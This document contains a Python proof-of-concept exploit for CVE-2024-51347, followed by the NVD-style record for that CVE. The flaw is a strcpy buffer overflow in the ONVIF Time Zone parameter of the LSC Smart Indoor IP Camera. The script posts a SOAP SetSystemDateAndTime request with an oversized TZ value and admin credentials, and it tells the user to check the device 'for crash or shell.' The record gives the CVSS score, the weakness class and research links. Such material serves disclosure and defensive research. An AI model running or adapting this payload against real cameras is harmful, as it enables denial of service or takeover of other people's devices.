CVE-2024-51347

#!/usr/bin/env python3 import requests # Target configuration # Note: Exploitation requires High Privileged (Admin) access target_url = "http://<TARGET_IP>:<PORT>/onvif/device_service" username = "admin" password = "<PASSWORD>" # Vulnerability: Buffer overflow in TZ parameter # Generating a payload to trigger the crash (e.g., 500 'A's) # Adjust length based on specific buffer size if known buffer_size = 500 payload = "A" * buffer_size # SOAP body structure to set Time Zone via ONVIF soap_body = f"""<?xml version="1.0" encoding="UTF-8"?> <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"> <s:Body> <SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl"> <TimeZone> <TZ>{payload}</TZ> </TimeZone> <UTCDateTime>false</UTCDateTime> </SetSystemDateAndTime> </s:Body> </s:Envelope>""" headers = { 'Content-Type': 'application/soap+xml; charset=utf-8', 'SOAPAction': '"http://www.onvif.org/ver10/device/wsdl/SetSystemDateAndTime"' } # Sending the malicious request try: # In a real scenario, implement Digest Auth or Basic Auth as required by the camera response = requests.post(target_url, data=soap_body, headers=headers, auth=(username, password), timeout=5) if response.status_code == 200 or response.status_code == 500: print("[+] Payload sent successfully. Check device for crash or shell.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error occurred: {e}")

{"cve": {"id": "CVE-2024-51347", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:29.097", "lastModified": "2026-03-25T18:16:24.673", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow vulnerability in the dgiot binary in LSC Smart Indoor IP Camera V7.6.32. The flaw exists in the handling of the Time Zone (TZ) parameter within the ONVIF configuration interface. The time zone (TZ) parameter does not have its length properly validated before being copied into a fixed-size buffer using the insecure strcpy function."}, {"lang": "es", "value": "Una vulnerabilidad de desbordamiento de búfer en el binario dgiot en LSC Smart Indoor IP Camera V7.6.32. La falla existe en el manejo del parámetro de Zona Horaria (TZ) dentro de la interfaz de configuración ONVIF. El parámetro de zona horaria (TZ) no tiene su longitud correctamente validada antes de ser copiado en un búfer de tamaño fijo utilizando la función strcpy insegura."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://github.com/victorGoeman/LSC-Indoor-Camera-Security-Research/blob/main/CVE-2024-51347.md", "source": "[email protected]"}, {"url": "https://github.com/victorGoeman/LSC-Indoor-Camera-Security-Research/tree/main", "source": "[email protected]"}, {"url": "https://github.com/victorGoeman/LSC-Indoor-Camera-Security-Research/blob/main/CVE-2024-51347.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}